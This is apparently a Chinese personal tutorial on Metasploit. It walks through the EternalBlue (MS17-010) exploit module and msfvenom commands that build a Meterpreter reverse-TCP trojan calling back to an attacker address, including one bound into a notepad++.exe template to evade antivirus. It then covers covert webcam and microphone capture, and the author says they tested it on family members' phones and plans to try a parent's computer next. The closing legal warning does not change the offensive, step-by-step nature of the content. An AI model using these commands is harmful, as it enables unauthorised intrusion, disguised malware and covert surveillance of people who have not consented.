文章目录
1. 启动metasploit-framework 命令行
msfconsole
2. msf使用法则
使用模块–>配置模块必选项–>运行模块
3. 永恒之蓝漏洞
不法分子利用制造勒索病毒。
该漏洞是微软445端口的问题,SMB,被微软命名为2017的第十号漏洞。
4. msf攻击尝试
msf搜索:
Internal blue?
Search ms17_010
使用模块
Use 0;use exploit/windows/smb/ms17_010_eternalblue
配置模块必选项
攻击地址,攻击目的……
Show options
Set 必选项:RHOSTS
Set rhosts 192.168.1.4
Set lport 10000
运行模块
我测试了我的虚拟机win10,而后测试了全家的手机,都没攻进去,大概是10版本太高?
5. 木马植入后门
445不行,去扫描其他漏洞。
没有漏洞,植入木马创造漏洞。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f exe -o winvenom64.exe
window:操作系统的版本,macos,linux等。
-f 文件类型
-o 重命名
6. 病毒太明显了,我们生成的文件自己写着:我是木马。
杀毒软件和防火墙直接就给删掉了,我们只好很固执的告诉勤奋的防火前:我相信它,他不是病毒!!!
7. msfconsole继续攻击
记得加上载荷,前面生成的
lhost和lport和msfvenom的相同。
8. 终于控制我的虚拟机win10了,看看能做什么?
Help
9. 录制视频流
Webcam_stream
但是虚拟机是没有摄像头的,呵呵……攻击还是要考虑目标机的实际情况。明天去试试家长的电脑。
没有视频,可以录音哦
record_mic参数:
-h:显示帮助。
-d :记录的秒数,默认为1秒
-F :wav文件路径。默认为HOME / [随机乱码名字] .wav
-p :自动播放捕获的音频,默认为“true”。
10. 绕过防火墙
法一:捆绑
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f exe -x notepad++.exe -o notepad++.exe
以常用软件的模板生成木马。
法二:加壳
添加一层壳,避免被反编译。
11. 切勿传播:
提供计算机操作系统入侵工具罪和非法入侵计算机操作系统罪。